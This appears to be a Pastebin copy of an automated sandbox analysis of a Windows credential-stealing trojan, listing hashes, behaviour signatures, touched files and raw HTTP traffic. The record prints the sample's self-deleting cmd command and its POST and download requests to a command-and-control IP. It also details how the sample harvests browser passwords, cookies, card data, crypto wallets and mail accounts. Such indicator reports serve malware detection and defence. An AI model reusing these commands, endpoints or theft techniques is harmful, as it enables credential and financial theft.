Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "TrojanSpy"
- * MalScore: 10.0
- * File Name: "Exes_120e329ec83209ab708fb55610915018.exe"
- * File Size: 1100800
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "b108573fb142b2206c10683b577307924d8ef7b9652ea9cf43aee63f78f41bf9"
- * MD5: "120e329ec83209ab708fb55610915018"
- * SHA1: "d34c4e618c3dc3ef1f5e0b763bab32e7cc86701c"
- * SHA512: "bcb5cdcfbc851cd44b85a897572cc471ede20a4f26d6dd268dc582b64c9454e3d5165a76eb2305edaf90114e508ce23fa046b6c63b22b6f7bc8289b00babc486"
- * CRC32: "82F7C7F0"
- * SSDEEP: "24576:6olCMYv9NPMch40WIDwCtfhs0jkXWbXA/NMte563B4nuzUWJKWQq:SMqlWIDw0s0AKQVM4563BUelYWQ"
- * Process Execution:
- "Exes_120e329ec83209ab708fb55610915018.exe",
- "Exes_120e329ec83209ab708fb55610915018.exe",
- "cmd.exe",
- "PING.EXE",
- "services.exe",
- "lsass.exe",
- "lsass.exe"
- * Executed Commands:
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_120e329ec83209ab708fb55610915018.exe",
- "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_120e329ec83209ab708fb55610915018.exe\"",
- "C:\\Windows\\system32\\lsass.exe",
- "C:\\Windows\\system32\\PING.EXE ping 1.1.1.1 -n 1 -w 3000"
- * Signatures Detected:
- "Description": "Attempts to connect to a dead IP:Port (3 unique times)",
- "Details":
- "IP": "35.246.248.56:80"
- "IP": "172.217.6.78:443"
- "IP": "172.217.6.65:443"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details":
- "ioc": "http://crl.globalsign.net/root-r2.crl0"
- "Description": "Network anomalies occured during the analysis.",
- "Details":
- "Anomaly": "'1.1.1.1' getaddrinfo with no actual connection to the IP."
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Exes_120e329ec83209ab708fb55610915018.exe -> cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_120e329ec83209ab708fb55610915018.exe\""
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://35.246.248.56/gate/log.php"
- "suspicious_request": "http://35.246.248.56/gate/sqlite3.dll"
- "suspicious_request": "http://35.246.248.56/gate/libs.zip"
- "suspicious_request": "http://35.246.248.56/file_handler2/file.php?hash=767b37a2ec9d0aeceed997d25f9946962424b478&js=4299a21a9c6f97e89773ebfcdaed8c17e3dd0715&callback=http://35.246.248.56/gate"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://35.246.248.56/gate/log.php"
- "url": "http://35.246.248.56/gate/sqlite3.dll"
- "url": "http://35.246.248.56/gate/libs.zip"
- "url": "http://35.246.248.56/file_handler2/file.php?hash=767b37a2ec9d0aeceed997d25f9946962424b478&js=4299a21a9c6f97e89773ebfcdaed8c17e3dd0715&callback=http://35.246.248.56/gate"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .rsrc, entropy: 7.70, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x000c9c00, virtual_size: 0x000c9ab0"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "Exes_120e329ec83209ab708fb55610915018.exe(1628) -> Exes_120e329ec83209ab708fb55610915018.exe(2464)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11846864 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft DCF MUI 2013"
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts"
- "key": "HKEY_CURRENT_USER\\Identities\\0A258175-2D14-4D69-9955-E200F247250F\\Software\\Microsoft\\Internet Account Manager\\Accounts"
- "Description": "Generates some ICMP traffic",
- "Details":
- "Description": "Collects information to fingerprint the system",
- "Details":
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "rc/user"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\sqlite31.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\P1kAlMiG2K",
- "C:\\Users\\user\\AppData\\Local\\Temp\\b7FzP5tM1Q",
- "C:\\Users\\user\\AppData\\Local\\Temp\\BI6DSS92c3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1Apgjk9lVK",
- "C:\\Users\\user\\AppData\\Local\\Temp\\chrome_cookie.txt",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PA320MG8\\libs1.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\prldap60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\qipcap.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleHandler.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleMarshal.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\breakpadinjector.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\IA2Marshal.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldap60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldif60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\lgpllibs.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\libEGL.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy_InUse.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32_InUse.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssckbi.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\machineinfo.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Log.zip",
- "\\??\\Nul"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\P1kAlMiG2K",
- "C:\\Users\\user\\AppData\\Local\\Temp\\b7FzP5tM1Q",
- "C:\\Users\\user\\AppData\\Local\\Temp\\BI6DSS92c3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1Apgjk9lVK",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ff-funcs.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Log.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\passwords.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\CC.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\chrome_cookie.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\firefox_cookie.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\chrome_autofill.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\machineinfo.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\screen.png",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleHandler.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleMarshal.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\breakpadinjector.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\IA2Marshal.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldap60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldif60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\lgpllibs.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\libEGL.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy_InUse.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32_InUse.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssckbi.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\prldap60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\qipcap.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\sqlite3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_120e329ec83209ab708fb55610915018.exe"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "doc-10-44-docs.googleusercontent.com",
- "answers":
- "data": "googlehosted.l.googleusercontent.com",
- "type": "CNAME"
- "data": "172.217.6.65",
- "type": "A"
- * Domains:
- "ip": "172.217.5.97",
- "domain": "doc-10-44-docs.googleusercontent.com"
- * Network Communication - ICMP:
- "src": "169.254.255.254
- "dst": "1.1.1.1",
- "type": 8,
- "data": "abcdefghijklmnopqrstuvwabcdefghi"
- "src": "1.1.1.1",
- "dst": "169.254.255.254
- "type": 0,
- "data": "abcdefghijklmnopqrstuvwabcdefghi"
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://35.246.248.56/gate/log.php",
- "user-agent": "",
- "method": "POST",
- "host": "35.246.248.56",
- "version": "1.1",
- "path": "/gate/log.php",
- "data": "POST /gate/log.php HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 151\r\nHost: 35.246.248.56\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://35.246.248.56/gate/sqlite3.dll",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "35.246.248.56",
- "version": "1.1",
- "path": "/gate/sqlite3.dll",
- "data": "GET /gate/sqlite3.dll HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 35.246.248.56\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://35.246.248.56/gate/libs.zip",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "35.246.248.56",
- "version": "1.1",
- "path": "/gate/libs.zip",
- "data": "GET /gate/libs.zip HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 35.246.248.56\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://35.246.248.56/file_handler2/file.php?hash=767b37a2ec9d0aeceed997d25f9946962424b478&js=4299a21a9c6f97e89773ebfcdaed8c17e3dd0715&callback=http://35.246.248.56/gate",
- "user-agent": "",
- "method": "POST",
- "host": "35.246.248.56",
- "version": "1.1",
- "path": "/file_handler2/file.php?hash=767b37a2ec9d0aeceed997d25f9946962424b478&js=4299a21a9c6f97e89773ebfcdaed8c17e3dd0715&callback=http://35.246.248.56/gate",
- "data": "POST /file_handler2/file.php?hash=767b37a2ec9d0aeceed997d25f9946962424b478&js=4299a21a9c6f97e89773ebfcdaed8c17e3dd0715&callback=http://35.246.248.56/gate HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nContent-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu\r\nContent-Length: 1500\r\nHost: 35.246.248.56\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment